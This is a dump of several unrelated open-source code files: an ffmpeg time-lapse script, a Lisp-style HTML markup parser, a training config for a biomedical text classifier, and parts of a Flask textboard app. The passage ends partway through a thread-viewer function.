output_path = self.get_output_path(input_path, exiftool)
if output_path in destinations:
raise Exception(f'Multiple files have the same destination!\n {input_path}\t→\t{output_path}.')
if output_path.is_file():
raise Exception(f'A file already exists at destination path!\n {input_path}\t→\t{output_path}.')
destinations.add(output_path)
plan[output_path.parent].append(
Map(
source=input_path,
destination=output_path,
)
)
return plan
def show_plan(self, plan):
for directory, mappings in plan.items():
print(f'{directory}')
for mapping in mappings:
print(f' {mapping.source}\t→\t{mapping.destination}')
``` |
{
"source": "153957/time-lapse-assemble",
"score": 2
} |
#### File: time-lapse-assemble/scripts/120524_ADL_ARN_EC_Archery.py
```python
import os
import ffmpeg
from time_lapse import output
NAME = os.path.basename(__file__).replace('.py', '')
PATTERNS = [
('/Volumes/Falcon/tl_temp/120524/D90_1/*.tiff', 48), # ARN_003613 - ARN_004715
('/Volumes/Falcon/tl_temp/120524/D700_1/*.tiff', 24), # ADL_101173 - ADL_102042
('/Volumes/Falcon/tl_temp/120524/D90_2/*.tiff', 48), # ARN_004855 - ARN_005341
('/Volumes/Falcon/tl_temp/120524/D90_3/*.tiff', 24), # ARN_005342 - ARN_005515
('/Volumes/Falcon/tl_temp/120524/D90_4/*.tiff', 48), # ARN_005520 - ARN_005983
('/Volumes/Falcon/tl_temp/120524/D700_2/*.tiff', 24), # ADL_102058 - ADL_102240
]
def make_movie():
inputs = [
ffmpeg
.input(pattern, pattern_type='glob', framerate=framerate)
.filter_('deflicker', mode='pm', size=10)
for pattern, framerate in PATTERNS
]
input = ffmpeg.concat(*inputs)
output.create_outputs(input, NAME, verbose=True, framerate=48)
if __name__ == '__main__':
make_movie()
```
#### File: time-lapse-assemble/time_lapse/watermark.py
```python
import os
JOST_FONT = os.path.join(os.path.dirname(__file__), 'fonts/Jost-400-Book.ttf')
FONT_OPTIONS = {
'fontfile': JOST_FONT,
'fontcolor': 'white',
'shadowcolor': 'black',
'x': 'main_w-text_w-line_h',
}
def add_watermark(input, text, subtext, fontsize=32):
watermarked_input = (
input
.drawtext(text=text, fontsize=fontsize, y='main_h-3*line_h', **FONT_OPTIONS)
.drawtext(text=subtext, fontsize=int(fontsize * 0.625), y='main_h-2*line_h', **FONT_OPTIONS)
)
return watermarked_input
``` |
{
"source": "153/lispmark",
"score": 3
} |
#### File: 153/lispmark/parse.py
```python
entity = ["quot", "amp", "lt", "gt", "le", "ge", "hellip",
"nbsp", "ensp", "emsp", "ndash", "mdash",
"hearts", "diams", "clubs", "spades", "loz",
"cent", "pound", "yen", "euro",
"copy", "reg", "trade", "para", "sect", "dagger",
"frac14", "frac12", "frac34",
"micro", "lambda", "divide", "times", "fnof",
"forall", "empty", "isin", "notin", "sum",
"radic", "infin", "there4", "oplus", "otimes",
"cong", "asymp", "equiv",
"aelig", "THORN", "szlig",
"uarr", "larr", "rarr", "darr"]
single = ["br", "hr", "p"]
wrap = ["b", "i", "u", "o", "s", "code",
"tt", "sup", "sub", "div", "span",
"blockquote", "h1", "h2", "h3", "h4",
"ul", "ol", "li",
"html", "body", "head", "title",
"table", "tr", "td", "th"]
arg1 = {"url":"<a href='{0}'>{0}</a>",
"anc":"<a name='{0}'></a>",
"m":"<pre><code>{0}</code></pre>",
"q": "<blockquote>{0}</blockquote>",
"style": "<link rel='stylesheet' type='text/css' href='{0}'>",
"sp": "<span class='spoiler'>{0}</span>",
"/": "({0})",
"'": "{0}",
"!": "<!-- {0} -->"}
arg2 = {"link":"<a href='{0}'>{1}</a>",
"img":"<img src='{0}' title='{1}'></img>"}
arg3 = {}
for tag in single:
arg1[tag] = str("<" + tag + ">{" + "0}")
for tag in wrap:
arg1[tag] = str("<" + tag + ">{" + "0}</" + tag + ">")
args = [i for i in arg1.keys()]
x = [args.append(i) for i in arg2.keys()]
# We call eval_input(input) which calls a
# parse_list() on split_functions(input).
#
# split_functions(input) returns
# a make_list() of tokenize(input).
# tokenize(input) replaces ( and ) with " ( " and " ) "
# after adding the contents of parens to list.
# make_list(tokens) adds to contents of (parens) to a list.
# parse_list() ensures that each item in the make_list is ran
# through markup_strings(parsed) from the inside-out.
#
# markup_strings(input) sends a list through the (sym) symbol
# dictionary, runs input through the (def) define macro,
# tries to run items through (,) the map function,
# runs inp[0] through arg1 if it's in arg1,
# returning arg1[inp[0]].format(inp[1])
# or runs inp[0] through arg2 if it's in arg2,
# returning arg2[inp[0]] formatting inp[1] and inp[2],
# otherwise returning (text in parens).
# css_spoiler() makes sure that spoilers work
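# A small worked example of the pipeline described above (a sketch, assuming
# the default tag tables defined at the top of this file):
#   eval_input("(b bold text)")        -> "<b>bold text</b>"
#   eval_input("(link http://x here)") -> "<a href='http://x'>here</a>"
#   eval_input("(sym amp)")            -> "&amp;"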
def css_spoiler():
print("""<style>\n
.spoiler {color: #000; background-color: #000;
}\n.spoiler:hover {
color:#fff;\n}</style>""")
def tokenize(inp=""): # Thanks <NAME>, lis.py
return inp.replace('(', ' ( ').replace(')', ' ) ').split()
def make_list(tokens): # Thanks <NAME>, lis.py
token = tokens.pop(0)
if '(' == token:
tmp = []
while tokens[0] != ')':
tmp.append(make_list(tokens))
tokens.pop(0)
return tmp
elif ')' == token:
return "?"
else:
return token
def split_functions(inp=""): # Thanks <NAME>, lis.py
return make_list(tokenize(inp))
def markup_strings(inp=""):
if type(inp) is str:
inp = inp[0].split(" ")
if len(inp) < 2 and inp[0] in single:
return f"<{inp[0]}>"
if inp[0] == ",":
        newlist = []  # hacky: currently only accepts one field
for i in inp[2:]:
newlist.append(inp[1].format(i))
return " ".join(newlist)
if inp[0] == "sym":
return do_sym(inp[1])
elif inp[0] == "def":
return do_def(inp[1:])
if len(inp) < 2:
inp.append(inp[0])
if inp[0] in arg1.keys():
inp[1] = " ".join(inp[1:])
return arg1[inp[0]].format(inp[1])
elif inp[0] in arg2.keys():
if len(inp) > 3:
inp[2] = " ".join(inp[2:])
elif len(inp) < 3:
inp.append(inp[1])
return arg2[inp[0]].format(inp[1], inp[2])
return "(" + " ".join(inp) + ")"
def parse_list(inp=[]):
parsed =[]
for n, i in enumerate(inp):
if type(i) is list:
parsed.append(parse_list(i))
else:
parsed.append(i)
return markup_strings(parsed)
def eval_input(inp=""):
return parse_list(split_functions(inp))\
        .replace('\\\\', '\\').replace('\\ ', '')
def do_sym(inp):
if inp in entity:
return f"&{inp};"
return f"&{inp};"
def do_def(inp=[]):
    inp = [i.replace('&gt;', '>').replace('&lt;', '<') \
for i in inp]
if len(inp) < 2:
return None
elif len(inp) > 2:
inp[1] = " ".join(inp[1:])
if inp[0] in args:
return " "
if "{2}" in inp[1]:
arg3[inp[0]] = inp[1]
elif "{1}" in inp[1]:
arg2[inp[0]] = inp[1]
elif "{0}" in inp[1]:
arg1[inp[0]] = inp[1]
else:
single.append(inp[0])
return ' '
def show_entity():
print("<table><tr>")
for n, e in enumerate(entity):
if not (n % 8):
print("<tr>")
print(f"<td>{e}<td>{do_sym(e)}")
print("</table>")
``` |
{
"source": "153lym/Bio_HANN",
"score": 2
} |
#### File: Bio_HANN/model/config.py
```python
import os
from .utils import get_logger, load_vocab, get_processing_word, \
get_trimmed_wordvec_vectors, get_random_wordvec_vectors, positional_embedding
class Config():
def __init__(self, parser, load=True):
"""Initialize hyperparameters and load vocabs
Args:
load_embeddings: (bool) if True, load embeddings into
np array, else None
"""
## parse args
self.parser = parser
# training parameters
parser.add_argument('--gpu', default='1', type=str,
help='gpus')
parser.add_argument('--epochs', default='50', type=int,
help='number of epochs')
parser.add_argument('--dropout', default='0.5', type=float,
help='dropout')
parser.add_argument('--batch_size', default='1', type=int,
help='batch size')
parser.add_argument('--lr', default='0.0001', type=float,
help='learning rate')
parser.add_argument('--lr_method', default='adam', type=str,
help='optimization method')
parser.add_argument('--lr_decay', default='0.99', type=float,
help='learning rate decay rate')
parser.add_argument('--clip', default='10', type=float,
help='gradient clipping')
parser.add_argument('--l2_reg_lambda', default='0.0001', type=float,
help='l2 regularization coefficient')
parser.add_argument('--nepoch_no_imprv', default='5', type=int,
help='number of epoch patience')
parser.add_argument('--num_heads', default='4', type=int,
                            help='number of attention heads')
        parser.add_argument('--ffn_dim', default='2048', type=int,
                            help='dimension of the position-wise feed-forward network')
# data and results paths
parser.add_argument('--dir_output', default='output/', type=str,
help='directory for output')
parser.add_argument('--data_root', default='data/', type=str,
help='directory for dataset')
parser.add_argument('--data_name', default='ethambutol/', type=str,
help='name for dataset')
parser.add_argument('--folds', default='', type=str,
help='name for dataset')
# character embedding
parser.add_argument('--embedding_file', default='embedding.txt',
type=str, help='directory for trimmed char embeddings file')
# model hyperparameters
parser.add_argument('--hidden_size_lstm_sentence', default='150', type=int,
help='hidden size of sentence level lstm')
parser.add_argument('--hidden_size_lstm_document', default='150', type=int,
help='hidden size of document level lstm')
parser.add_argument('--cnn_filter_num', default='300', type=int,
help='number of cnn filters for each window size')
parser.add_argument('--attention_size', default='300', type=int,
help='attention size')
parser.add_argument('--num_units', default='128', type=int,
help='the dim of the query,key,value')
parser.add_argument('--restore', action='store_true',
help='whether restore from previous trained model')
parser.add_argument('--random_embeddings', action='store_false',
help='whether use random embedding for characters')
parser.add_argument('--train_accuracy', action='store_false',
help='whether report accuracy while training')
parser.add_argument('--use_cnn', action='store_false',
help='whether use cnn for sentence representation')
parser.add_argument('--use_bilstm', action='store_true',
help='whether use bilstm for sentence representation')
parser.add_argument('--use_transformer', action='store_true',
help='whether use transformer for sentence representation')
parser.add_argument('--use_attention', action='store_true',
help='whether use attention based pooling')
parser.add_argument('--use_doc_attention', action='store_true',
help='whether use doc attention based pooling')
parser.add_argument('--use_doc_bilstm', action='store_false',
help='whether use bilstm for doc representation')
parser.add_argument('--use_doc_transformer', action='store_true',
help='whether use transformer for doc representation')
self.parser.parse_args(namespace=self)
self.dir_model = os.path.join(self.dir_output + '/' + self.data_name + '/' + self.folds, "model.weights")
self.path_log = os.path.join(self.dir_output + '/' + self.data_name + '/' + self.folds, "log.txt")
# dataset
self.filename_dev = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'dev.txt')
self.filename_test = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'test.txt')
self.filename_train = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'train.txt')
self.word_position_dev = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'dev_wordposition.txt')
self.word_position_test = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'test_wordposition.txt')
self.word_position_train = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'train_wordposition.txt')
self.sentence_position_dev = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'dev_sentenceposition.txt')
self.sentence_position_test = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'test_sentenceposition.txt')
self.sentence_position_train = os.path.join(self.data_root + self.data_name + '/' + self.folds, 'train_sentenceposition.txt')
# vocab
self.filename_words = os.path.join('data/' + self.data_name + '/words.txt')
self.filename_tags = os.path.join('data/' + self.data_name + '/tags.txt')
# directory for training outputs
if not os.path.exists('data'):
os.makedirs('data')
# directory for data output
if not os.path.exists(self.dir_output+ '/' + self.data_name+ '/' + self.folds):
os.makedirs(self.dir_output+ '/' + self.data_name+ '/' + self.folds)
if not os.path.exists(self.dir_out_class):
os.makedirs(self.dir_out_class)
# create instance of logger
self.logger = get_logger(self.path_log)
# log the attributes
msg = ', '.join(['{}: {}'.format(attr, getattr(self, attr)) for attr in dir(self) \
if not callable(getattr(self, attr)) and not attr.startswith("__")])
self.logger.info(msg)
# load if requested (default)
if load:
self.load()
def load(self):
"""Loads vocabulary, processing functions and embeddings"""
# 1. vocabulary
self.vocab_words = load_vocab(self.filename_words)
self.vocab_tags = load_vocab(self.filename_tags)
self.nwords = len(self.vocab_words)
self.ntags = len(self.vocab_tags)
# 3. get processing functions that map str -> id
self.processing_word = get_processing_word(self.vocab_words, lowercase=True)
self.processing_tag = get_processing_word(self.vocab_tags,
lowercase=False, allow_unk=False)
# 4. get pre-trained embeddings
if self.random_embeddings:
            print('Randomly initializing the character vectors....')
self.dim_word = 128
self.embeddings = get_random_wordvec_vectors(self.dim_word, self.vocab_words)
self.word_position_embedding = positional_embedding(12450, position='word', dim=self.dim_word)
if self.use_transformer:
self.sentence_position_embedding = positional_embedding(4009, position='sentence',
dim=self.num_units)
elif self.use_bilstm:
self.sentence_position_embedding = positional_embedding(4009, position='sentence',
dim=self.hidden_size_lstm_document * 2)
elif self.use_cnn:
self.sentence_position_embedding = positional_embedding(4009, position='sentence',
dim=self.cnn_filter_num * 3)
else:
            print('Using pre-trained embeddings to initialize the character vectors....')
self.embeddings = get_trimmed_wordvec_vectors(self.embedding_file, self.vocab_words)
self.dim_word = self.embeddings.shape[1]
self.word_position_embedding = positional_embedding(12450, position='word', dim=self.dim_word)
if self.use_transformer:
self.sentence_position_embedding = positional_embedding(4009, position='sentence',
dim=self.num_units)
elif self.use_bilstm:
self.sentence_position_embedding = positional_embedding(4009, position='sentence',
dim=self.hidden_size_lstm_document * 2)
elif self.use_cnn:
self.sentence_position_embedding = positional_embedding(4009, position='sentence',
dim=self.cnn_filter_num * 3)
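        # In both branches above the sentence-position embedding dimension is chosen
        # to match the output size of the sentence encoder: num_units for the
        # transformer, 2 * hidden_size_lstm_document for the BiLSTM, and
        # cnn_filter_num * 3 for the CNN (presumably three window sizes), so the
        # positional embedding can be added to the sentence representation element-wise.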
``` |
{
"source": "153/multichan",
"score": 2
} |
#### File: 153/multichan/app.py
```python
from flask import Flask, request, send_from_directory
from home import home
from viewer import viewer
from writer import writer
from whitelist import whitelist
from tags import tags
from atom import atom
from boards import boards
#from admin import admin
#from cookies import cook
import os
import time
import daemon
import refresh
import pagemaker as p
import settings as s
_port = s._port
app = Flask(__name__,
static_url_path = "",
static_folder = "static",)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app.register_blueprint(home)
app.register_blueprint(viewer)
app.register_blueprint(writer)
app.register_blueprint(whitelist)
if s.boards:
app.register_blueprint(boards)
app.register_blueprint(tags)
app.register_blueprint(atom)
# app.register_blueprint(admin)
# app.register_blueprint(cook)
if not os.path.isdir("./static/cap/"):
os.mkdir("./static/cap/")
if not os.path.isdir("./archive/"):
os.mkdir("./archive/")
@app.errorhandler(404)
def not_found(e):
return p.mk(p.html("404"))
@app.route('/api/')
@app.route('/raw/')
def api_help():
return base_static("help.html")
@app.route('/api/<path:filename>')
@app.route('/raw/<path:filename>')
def base_static(filename):
return send_from_directory(app.root_path + '/threads/', filename)
if __name__ == '__main__':
    refresh.main()
    daemon.run()
    app.run(host="0.0.0.0", port=_port)
```
#### File: 153/multichan/daemon.py
```python
import time
import threading
import refresh
import settings
import mod
def linker():
cnt = 0
while True:
refresh.linksites()
try:
mod.main()
except:
pass
cnt += 1
print(cnt)
time.sleep(settings.refreshtime)
def run():
d = threading.Thread(target=linker)
d.start()
```
#### File: 153/multichan/home.py
```python
from flask import Blueprint, request
from datetime import date
from datetime import timedelta
import tripcode as tr
import pagemaker as p
import settings as s
home = Blueprint("home", __name__)
@home.route('/', strict_slashes=False)
def hello_world():
return p.mk(p.html("home").format(s.name))
@home.route('/rules')
def rules():
return p.mk(p.html("rules"))
@home.route('/about')
def about():
return p.mk(p.html("about"))
@home.route('/trip/<trip>', methods=['POST', 'GET'])
@home.route('/trip/', methods=['POST', 'GET'])
def do_trip(trip=None):
if request.method == "POST":
trip = request.form["trip"]
return "<br>".join([
"#" + trip,
"!" + tr.mk(trip),
"<br>##" + trip,
"!!" + tr.sec(trip)])
elif trip:
return "<br>".join([
"#" + trip,
"!" + tr.mk(trip),
"<br>##" + trip,
"!!" + tr.sec(trip)])
return """<form action='.' method='post'>
<input type='text' name='trip'><input type='submit' value='Go'>"""
@home.route('/stats/')
def counter():
with open("./static/counter.txt", "r") as cnt:
cnt = int(cnt.read().strip())
with open("./static/counter.txt", "w") as update:
update.write(str(cnt + 1))
with open(s.bans, "r") as bans:
bans = bans.read().splitlines()
with open(s.delete, "r") as dele:
dele = dele.read().splitlines()
with open("./threads/list.txt", "r") as threads:
threads = threads.read().splitlines()
with open("./threads/tags.txt", "r") as tags:
tags = tags.read().splitlines()
tcnt = str(len(threads))
lcnt = str(len([t for t in threads if t[:6] == "local "]))
rcnt = str(sum([int(t.split(" ")[3]) for t in threads]))
acnt = str(sum([int(t.split(" ")[4]) for t in threads]))
dcnt = str(len(dele))
bcnt = str(len(bans))
tags = str(len(tags))
atags = str(len(s.tags))
page = []
page.append(" ".join([f"<p><div>You are visitor #{cnt+1}",
"to this stats page at", s.url, "<ul>"]))
page.append(" ".join(["<li>", str(len(s.friends)), "friend servers"]))
page.append(" ".join(["<li>", atags, "featured tags"]))
page.append(" ".join(["<li>", tags, "unique tags<p>"]))
page.append(" ".join(["<li>", lcnt, "local threads"]))
page.append(" ".join(["<li>", tcnt, "known threads<p>"]))
page.append(" ".join(["<li>", rcnt, "local replies"]))
page.append(" ".join(["<li>", acnt, "total replies<p>"]))
page.append(" ".join(["<li>", dcnt, "deleted posts"]))
page.append(" ".join(["<li>", bcnt, "banned addresses"]))
page.append("</ul></div>")
return p.mk("\n".join(page))
@home.route('/friends')
def friends():
title = "<div><h1>Friends of " + s.name
title += "</h1><h4>" + s.url
if s.images:
title += f"<p>images: <a href='{s.ihost}'>{s.ihost}</a><br>"
else:
title += "<p>Images not enabled!"
if s.boards:
title += "<br><a href='/b/'>Boards enabled</a>"
else:
title += "<br>Boards not enabled!"
title += "</h4>"
title += "Friends are other multichan websites that "
title += "this server downloads threads and comments from."
flist = []
fstring = "<li> <a href='{1}'>{0}</a> {1}"
for f in s.friends:
flist.append(fstring.format(f, s.friends[f]))
flist = "<ul>" + "\n".join(flist) + "</ul>"
page = title + flist + "</div>"
return p.mk(page)
def norm2dqn(year, month, day):
dqnday = date(1993, 8, 31)
norm = date(year, month, day)
print(norm-dqnday)
return (norm - dqnday).days
def dqn2norm(day):
dqnday = date(1993, 8, 31)
norm = dqnday + timedelta(days=day)
print(norm)
return norm
@home.route('/dqn/<mode>/<dokyun>', methods=['POST', 'GET'])
@home.route('/dqn/', methods=['POST', 'GET'])
def dqn(dokyun=None, mode=None):
if request.method == "POST":
dokyun = request.form["dqn"]
mode = request.form["mode"]
if dokyun:
try:
if mode == "n":
print(dokyun)
dokyun = [int(i) for i in dokyun.split("-")]
print(dokyun)
dokyun = norm2dqn(*dokyun)
elif mode == "d":
dokyun = int(dokyun)
dokyun = dqn2norm(dokyun)
return str(dokyun) + "<p><a href='/dqn'>(back)</a>"
except:
return "<a href='/dqn'>/dqn/yyyy-mm-dd</a>"
return """<form action='.' method='post'>
yyyy-mm-dd for normal; just day for DQN.
<br><input type="radio" name="mode" value="d">
<label for="mode">DQN->Normal</label>
<br><input type="radio" name="mode" value="n">
<label for="mode">Normal->DQN</label>
<br><input type='text' name='dqn'>
<br><input type='submit' value='Go'>
</form>"""
```
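The DQN date helpers above count days from a 1993-08-31 epoch. A minimal round-trip check, assuming `home.py` and its dependencies (flask, settings, tripcode, pagemaker) are importable from the repo root:
```python
from datetime import date
from home import norm2dqn, dqn2norm

# 1993-09-01 is one day after the 1993-08-31 epoch
assert norm2dqn(1993, 9, 1) == 1
assert dqn2norm(1) == date(1993, 9, 1)

# the conversion round-trips for any day count
d = dqn2norm(10000)
assert norm2dqn(d.year, d.month, d.day) == 10000
```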
#### File: 153/multichan/tags.py
```python
import os
from flask import Blueprint, request
import settings as s
import pagemaker as p
tags = Blueprint("tags", __name__)
tlist = s.tags
flist = s.friends
# tags_host("host")
# tags_load()
# tags_view(["tags"])
# tags_addthread("num", ["tags"])
def tags_load(host=""):
tagp = "/".join(["./threads", host, "tags.txt"])
with open(tagp, "r") as tags:
tags = tags.read().splitlines()
tags = [x.split(" ") for x in tags]
tagdb = {}
for t in tags:
tag = t[0]
threads = t[1:]
if "-" in threads[0]:
threads = [x.split("-") for x in threads]
if len(threads) and threads != [""]:
if tag in tagdb:
tagdb[tag] += [t for t in threads if t not in tagdb[tag]]
print(tagdb[tag])
else:
tagdb[tag] = threads
else:
tagdb[tag] = []
return tagdb
def tags_threads(tags=[]):
db = tags_load()
threads = []
tmp = []
for t in tags:
if t in db:
tmp += db[t]
else:
tmp += []
for t in tmp:
if t not in threads and len(t):
threads.append(t)
return threads
def mkhost(host):
hostp = "/".join(["./threads", host])
tagp = hostp + "/tags.txt"
threads = [x.path for x in os.scandir(hostp) if x.is_dir()]
tagd = {}
for thread in threads:
num = thread.split("/")[3]
head = thread + "/head.txt"
with open(head, "r") as head:
tags = head.read().splitlines()
try:
tags = tags[1].split(" ")
except:
tags = ["random"]
for t in tags:
if t not in tagd:
tagd[t] = []
tagd[t].append(num)
tagf = [" ".join([t, *tagd[t]]) for t in tagd]
with open(tagp, "w") as tags:
tags.write("\n".join(tagf))
return
def mksite(remake=0):
tdb = {x: [] for x in tlist}
for f in flist:
if remake:
mkhost(f)
tpath = "/".join(["./threads", f, "tags.txt"])
with open(tpath, "r") as tag:
tag = tag.read().splitlines()
tag = [x.split(" ") for x in tag]
tag = {x[0]: x[1:] for x in tag}
for t in tag:
tag[t] = [[f, x] for x in tag[t]]
if t not in tdb:
tdb[t] = []
tdb[t].append(tag[t])
tagl = []
for t in tdb:
tdb[t] = [y for x in tdb[t] for y in x]
entry = " ".join(["-".join(x) for x in tdb[t]])
tagl.append(" ".join([t, entry]))
tagl = "\n".join(tagl)
with open("./threads/tags.txt", "w") as tagf:
tagf.write(tagl)
return
@tags.route('/tags/')
def tag_index():
tdb = tags_load()
sentry = "<li><b><a href='/tags/{0}/'>{0}</a></b> ({1} discussions)"
oentry = "<li><a href='/tags/{0}/'>{0}</a> ({1} discussions)"
result = ["<div><h1>Conversation tags</h1>",
"Bolded tags are the default tags selected by the site admin."]
result.append("<br>Tags can be combined with the '+' plus sign in URL.")
links = ["<ul>"]
site_tags = {t : len(tdb[t]) for t in tlist}
site_tags = {k: v for k, v in sorted(site_tags.items(),
key= lambda x: int(x[1]))[::-1]}
all_tags = {t : len(tdb[t]) for t in list(tdb.keys()) if t not in tlist}
all_tags = {k: v for k, v in sorted(all_tags.items(),
key= lambda x: int(x[1]))[::-1]}
for t in site_tags:
links.append(sentry.format(t, site_tags[t]))
        if site_tags[t] == 1:
            links[-1] = links[-1].replace("s)", ")")
links.append("</ul><ul>")
cnt = 0
last = 0
for t in all_tags:
cnt = int(all_tags[t])
if (cnt < last) and (cnt == 1):
links.append("</ul><ul>")
links.append(oentry.format(t, all_tags[t]))
if all_tags[t] == 1:
links[-1] = links[-1].replace("s)", ")")
last = cnt
links.append("</ul></div>")
result.append("\n".join(links))
result = p.mk("\n".join(result))
return result
@tags.route('/tags/<topic>/')
def tag_page(topic):
line = "<tr><td>{0} " \
+ "<td><a href='/threads/{0}/{1}'>{5}</a>" \
+ "<td>{4}"
result = []
ot = "".join(topic)
if "+" in topic:
topic = topic.split("+")
else:
topic = [topic]
result.append("<div><h1> #" + " #".join(topic) + "</h1>")
result.append(" <a href='/create/" + ot + "'>+ create new</a><br>")
result.append("<i>Note: tags can be combined using the "
"+ (plus sign) in the URL</i></div>")
result.append("<p><table>")
result.append("<tr><th>origin<th>title<th>replies")
threads = tags_threads(topic)
with open("./threads/list.txt") as site:
site = site.read().splitlines()
site = [s.split(" ") for s in site]
site = [[*s[:5], " ".join(s[5:])] for s in site
if [s[0], s[1]] in threads]
result[0] += " (" + str(len(site)) + " threads)</h1>"
test = "\n".join([line.format(*t) for t in site])
result.append(test)
result.append("</table>")
result = p.mk("\n".join(result))
return result
if __name__ == "__main__":
mksite(1)
# tags_load() -> db
# tags_threads([]) -> threads
# mkhost()
# mksite()
# tag_index()
#print("\n0chan:")
#tags_load("0chan")
```
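The tag indexes that `tags_load`, `mkhost`, and `mksite` pass around are plain space-separated text files. A sketch of the two layouts implied by the code above (file contents are invented for illustration):
```python
# Per-host file written by mkhost() at ./threads/<host>/tags.txt --
# one tag per line, followed by the thread numbers carrying that tag:
#
#     music 12 15 20
#     random 3
#
# Global file written by mksite() at ./threads/tags.txt --
# thread references become "<host>-<number>" pairs:
#
#     music local-12 0chan-3
#
# tags_load() (no host argument) parses the global layout into a dict:
expected = {"music": [["local", "12"], ["0chan", "3"]]}
```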
#### File: 153/multichan/viewer.py
```python
import os
import time
import re
from flask import Blueprint
from flask import request
import utils as u
import settings as s
import pagemaker as p
import writer
import whitelist
viewer = Blueprint("viewer", __name__)
friends = s.friends
with open("templ/post.t", "r") as postt:
postt = postt.read()
with open("templ/newr.t", "r") as newr:
newr = newr.read()
with open("templ/thread.t", "r") as threadt:
threadt = threadt.read()
def hostlist(li=0):
    hosts = [x.path.split("/")[2] for x
             in os.scandir("./threads/") if x.is_dir()]
    if li == 1:
        return hosts
    hosts2 = hosts
    hosts.remove("local")
    hosts.insert(0, "local")
    hosts = []
for x in hosts2:
hosts.append(f"\n<a href='/threads/{x}'>{x}</a>")
hosts.insert(0, "\n<a href='/threads/'>Global</a>")
hosts = "\n<b>Hosts:</b> " + " \n♦ ".join(hosts)
hosts = "<header style='text-align: right'>" + hosts + "\n</header>"
return hosts
def tlist(host=''):
linkf = "<td><a href='{0}'>{1}</a><td>{2}"
linkl = []
    if not host:
        return all_index()
    if host not in s.friends:
        return all_index()
# if host and host in s.friends:
with open(f"./threads/{host}/list.txt", "r") as toplist:
toplist = toplist.read().splitlines()
for t in toplist:
t = t.split(" ")
t[4] = " ".join(t[4:])
t[0] = f"/threads/{host}/{t[0]}/"
linkl.append(linkf.format(t[0], t[4], t[3]))
return linkl
def all_index():
linkf = "<td>{3} <td><a href='{0}'>{1}</a><td> {2} "
linkl = []
blist = hostlist(1)
toplist = []
for b in blist:
with open(f"./threads/{b}/list.txt", "r") as t:
t = t.read().splitlines()
toplist.append([" ".join([x, b]) for x in t])
toplist = [y for x in toplist for y in x]
toplist = [x.split(" ") for x in toplist]
toplist.sort(key=lambda x:x[1], reverse=1)
toplist = [" ".join(x) for x in toplist]
for t in toplist:
t = t.split(" ")
t[4] = " ".join(t[4:-1])
t[0] = f"/threads/{t[-1]}/{t[0]}/"
if t[-1] == "local":
pass
else:
t[-1] = f"{t[-1]}"
linkl.append(linkf.format(t[0], t[4], t[3], t[-1]))
return linkl
@viewer.route('/threads/')
def view_all():
tops = all_index()
tops[0] = f"<header><hr>({len(tops)} discussions) ♦ " \
+ "<a href='/create'>Add new</a></header>" \
+ "<h1>All Sites</h1><table>" \
+ "<tr><th>origin<th>title<th>replies" \
+ "<tr>" + tops[0]
page = p.mk(hostlist() + "<tr>".join(tops) + "</table>")
return page
@viewer.route('/threads/<host>/')
def view(host):
# tlist() takes host input
if host and host in s.friends:
url = s.friends[host]
tops = tlist(host)
tops[0] = f"<header>({len(tops)} discussions) ♦ " \
+ "<a href='/create'>Add new</a> ♦ " \
+ f"from <a href='{url}'>{url}</a></header>" \
+ f"<h1>{host}</h1><table>" \
+ "<tr><th>title<th>replies" \
+ "<tr>" + tops[0]
else:
tops = tlist()
tops[0] = "<h1>All Sites</h1><ol><li>" + tops[0]
if host == "sageru":
tops[0] = u.bees + tops[0]
tops[0] = hostlist() + tops[0]
return p.mk("<tr>".join(tops) + "</table>\n")
@viewer.route('/threads/<host>/<thread>/')
def view_t(host, thread):
lock = 0
tpath = f"./threads/{host}/{thread}/"
if os.path.isfile(tpath+"lock"):
lock = 1
tinfo = {"title":"", "source":"", "tags":"", "messages":""}
# Get the list of thread replies and the thread title.
with open(tpath + "list.txt", "r") as tind:
thr = [t.split(" ") for t in tind.read().splitlines()]
with open(tpath + "head.txt", "r") as meta:
meta = meta.read().splitlines()
tlink = "<a href='/tags/{0}/'>#{0}</a>"
meta[1] = meta[1].split(" ")
meta[1] = " ".join([tlink.format(m) for m in meta[1]])
tinfo["tags"] = meta[1]
# meta[1] = "tags: " + meta[1]
# Load the replies.
hosts = set([t[0] for t in thr])
tdb = {}
for b in hosts:
bfn = tpath + b + ".txt"
with open(bfn, "r") as bfn:
bfn = bfn.read().splitlines()
for n, x in enumerate(bfn):
x = x.split("<>")
if s.ihost in x[2]:
try:
x[2] = u.imgur(x[2])
except:
continue
tdb[x[0]] = [b, *x, n]
threadp = []
pnum = 0
psub = 0
cnt = {friends[x]: 0 for x in hosts}
for p in sorted(tdb.keys()):
p = tdb[p]
p.append(p[0])
p[4], p[5] = p[5], p[4]
aname = friends[p[0]]
if p[0] == host:
pnum += 1
psub = 0
p[0] = f"<a id='{pnum}' href='#{pnum}' " \
+ f"onclick='quote(\"{pnum}\")'>#{str(pnum)}</a>"
else:
psub += 1
cnt[aname] += 1
p[0] = ",".join([str(pnum), str(psub)])
p[0] = f"<a id='{aname}/{cnt[aname]}' name='{p[0]}' href='#{aname}/{cnt[aname]}' " \
+ f"onclick='quote(\"{aname}/{cnt[aname]}\")'>#{p[0]}</a>"
if p[4] != "local":
p[4] = f"🌎 <a href='{friends[p[4]]}'>{p[4]}</a>"
else:
p[4] = ""
p[3] = p[3].split("<br>")
p[3] = "<br>".join([f"<b class='quote'>{x}</b>"
if len(x) and x[0] == ">" else x
for x in p[3]])
p[1] = u.unix2hum(p[1])
        p[3] = p[3].replace("&", "&amp;")  # escape raw ampersands for HTML output
# Set up >>linking
fquote = {">>" + friends[f]: f for f in friends}
replies = []
for f in fquote:
if f in p[3]:
p[3] = p[3].split(f)
for n, x in enumerate(p[3]):
if "</" in x:
x = x.split("</")[0]
if " " in x:
x = x.split(" ")[0]
replies.append([f, x])
p[3] = f.join(p[3])
replies = ["".join(x) for x in replies]
for r in replies:
try:
if "https" in r:
r2 = ">>https://" + r.split("/")[2]
elif "http" in r:
r2 = ">>http://" + r.split("/")[2]
r2 = r.replace(r2, ">>" + fquote[r2])
except:
r2 = r
rep = "<a href='#" + r[2:] + "'>" \
+ r2 + "</a>"
